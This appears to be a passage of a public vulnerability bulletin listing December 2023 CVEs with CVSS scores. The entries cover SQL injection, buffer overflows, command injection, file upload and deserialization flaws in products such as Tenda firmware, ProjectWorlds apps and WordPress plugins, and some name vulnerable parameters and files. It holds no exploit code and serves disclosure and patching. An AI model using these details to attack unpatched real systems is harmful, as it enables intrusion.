panasonic — control_fpwin_pro Out-of-bouds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. 2023-12-19 7.8 CVE-2023-6315
product-security@gg.jp.panasonic.com
peazip — peazip A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release. 2023-12-17 7.8 CVE-2023-6891
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
perl — perl A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer. 2023-12-18 7 CVE-2023-47038
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
phz76 — rtspserver A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-17 9.8 CVE-2023-6888
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
projectworlds — online_voting_system_project Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-48433
help@fluidattacks.com
help@fluidattacks.com
projectworlds — online_voting_system_project Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-48434
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — leave_management_system_project Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setearnleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 8.8 CVE-2023-44481
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — leave_management_system_project Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setsickleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 8.8 CVE-2023-44482
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘ch’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45115
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘demail’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45116
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘eid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45117
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘fdid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45118
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘n’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45119
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘qid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45120
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘desc’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45121
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘name’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45122
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘right’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45123
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘tag’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45124
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘time’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45125
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘total’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45126
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘wrong’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45127
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic3’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-46791
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘psd’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48685
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘user’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48686
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘from’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48687
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘to’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48688
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘byname’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48689
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘bynum’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48690
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_id’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48716
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48717
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48718
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘roll_no’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48719
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘password’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48720
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48722
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘rno’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48723
help@fluidattacks.com
help@fluidattacks.com
redpanda — redpanda Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API. 2023-12-18 9.8 CVE-2023-50976
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
rmountjoy92 — dashmachine A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability. 2023-12-17 9.8 CVE-2023-6899
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
rmountjoy92 — dashmachine A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: ‘../filedir’. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability. 2023-12-17 9.1 CVE-2023-6900
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
shenzen_libituo_technology_co.,_ltd — lbt-t300-t310_firmware Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. 2023-12-15 9.8 CVE-2023-50469
cve@mitre.org
silabs — gecko_software_development_kit An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. 2023-12-15 9.1 CVE-2023-4020
product-security@silabs.com
product-security@silabs.com
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service. 2023-12-15 8 CVE-2023-48380
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48378
twcert@cert.org.tw
solarwinds — access_rights_manager Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment. 2023-12-21 7.6 CVE-2023-40058
psirt@solarwinds.com
sourcecodester — best_courier_management_system A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256. 2023-12-17 9.8 CVE-2023-6898
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
starnight — micro_http_server In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI. 2023-12-17 9.8 CVE-2023-50965
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function. 2023-12-20 9.8 CVE-2023-50983
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function. 2023-12-20 9.8 CVE-2023-50984
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function. 2023-12-20 9.8 CVE-2023-50985
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function. 2023-12-20 9.8 CVE-2023-50986
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function. 2023-12-20 9.8 CVE-2023-50987
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function. 2023-12-20 9.8 CVE-2023-50988
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function. 2023-12-20 9.8 CVE-2023-50989
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function. 2023-12-20 9.8 CVE-2023-50990
cve@mitre.org
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function. 2023-12-20 9.8 CVE-2023-50992
cve@mitre.org
cve@mitre.org
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-16 9.8 CVE-2023-6885
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink — a7100ru_firmware A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-18 9.8 CVE-2023-6906
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tutao — tutanota Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as `ftp:`, `smb:`, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue. 2023-12-15 9.3 CVE-2023-46116
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
u-blox — toby-l2 A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well.. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280. 2023-12-20 7.6 CVE-2023-0011
vulnerability@ncsc.ch
uffizio — gps_tracker A Remote Code Execution vulnerability exist in Uffizio’s GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources 2023-12-16 9.8 CVE-2020-17485
cve@mitre.org
cve@mitre.org
uffizio — gps_tracker An improper access control vulnerability exists in Uffizio’s GPS Tracker all versions that lead to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. 2023-12-16 7.5 CVE-2020-17483
cve@mitre.org
cve@mitre.org
unrealircd — unrealircd A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. 2023-12-16 7.5 CVE-2023-50784
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
wangmarket — wangmarket A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability. 2023-12-17 9.8 CVE-2023-6886
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wasmer_io — wasmer Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. 2023-12-22 8.4 CVE-2023-51661
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
web-soudan — mw_wp_form The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-16 9.8 CVE-2023-6559
security@wordfence.com
security@wordfence.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop – Global Dropshipping. This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0. 2023-12-20 10 CVE-2023-25970
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0. 2023-12-20 10 CVE-2023-29384
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0. 2023-12-20 10 CVE-2023-49772
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23. 2023-12-20 10 CVE-2023-49773
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. 2023-12-21 10 CVE-2023-49778
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5. 2023-12-20 9.9 CVE-2023-23970
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1. 2023-12-20 9.1 CVE-2023-28170
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1. 2023-12-20 9.1 CVE-2023-29102
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2. 2023-12-20 9.9 CVE-2023-31215
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65. 2023-12-20 9.9 CVE-2023-31231
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in xtemos WoodMart – Multipurpose WooCommerce Theme. This issue affects WoodMart – Multipurpose WooCommerce Theme: from n/a through 1.0.36. 2023-12-21 9.8 CVE-2023-32242
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4. 2023-12-20 9.3 CVE-2023-32590
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40. 2023-12-20 9.9 CVE-2023-33318
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3. 2023-12-20 9.9 CVE-2023-34007
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0. 2023-12-20 9.9 CVE-2023-34385
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce Professional. This issue affects HUSKY – Products Filter for WooCommerce Professional: from n/a through 1.3.4.2. 2023-12-20 9.8 CVE-2023-40010
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2. 2023-12-20 9.1 CVE-2023-40204
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902. 2023-12-20 9 CVE-2023-45603
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. 2023-12-20 9.9 CVE-2023-46149
audit@patchstack.com
wordpress — wordpress Missing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9. 2023-12-19 9.8 CVE-2023-47754
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Porto Theme Porto Theme – Functionality. This issue affects Porto Theme – Functionality: from n/a before 2.12.1. 2023-12-19 9.3 CVE-2023-48738
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoonthemes Couponis – Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis – Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2. 2023-12-19 9.8 CVE-2023-49750
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoon themes Adifier – Classified Ads WordPress Theme. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. 2023-12-20 9.3 CVE-2023-49752
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. 2023-12-20 9.3 CVE-2023-49776
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0. 2023-12-20 9.1 CVE-2023-49814
audit@patchstack.com
wordpress — wordpress The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn’t be too long, as the 2FA codes are 6 digits. 2023-12-18 9.8 CVE-2023-6272
contact@wpscan.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1. 2023-12-17 8.8 CVE-2023-24380
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3. 2023-12-20 8.3 CVE-2023-28782
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BestWebSoft Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress: from n/a through 1.7.0. 2023-12-20 8.5 CVE-2023-29096
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Favethemes Houzez – Real Estate WordPress Theme. This issue affects Houzez – Real Estate WordPress Theme: from n/a before 2.8.3. 2023-12-20 8.2 CVE-2023-29432
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23. 2023-12-20 8.5 CVE-2023-30495
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10. 2023-12-20 8.5 CVE-2023-30750
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2. 2023-12-20 8.1 CVE-2023-31092
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CrawlSpider SEO Change Monitor – Track Website Changes. This issue affects SEO Change Monitor – Track Website Changes: from n/a through 1.2. 2023-12-20 8.5 CVE-2023-33209
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1. 2023-12-18 8.8 CVE-2023-33214
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2. 2023-12-18 8.8 CVE-2023-34168
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1. 2023-12-20 8.1 CVE-2023-35876
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0. 2023-12-19 8.3 CVE-2023-37390
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6. 2023-12-20 8.2 CVE-2023-37871
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5. 2023-12-20 8.3 CVE-2023-40555
audit@patchstack.com
wordpress — wordpress The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 2023-12-18 8.8 CVE-2023-4311
contact@wpscan.com
wordpress — wordpress Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2. 2023-12-19 8.8 CVE-2023-46212
audit@patchstack.com
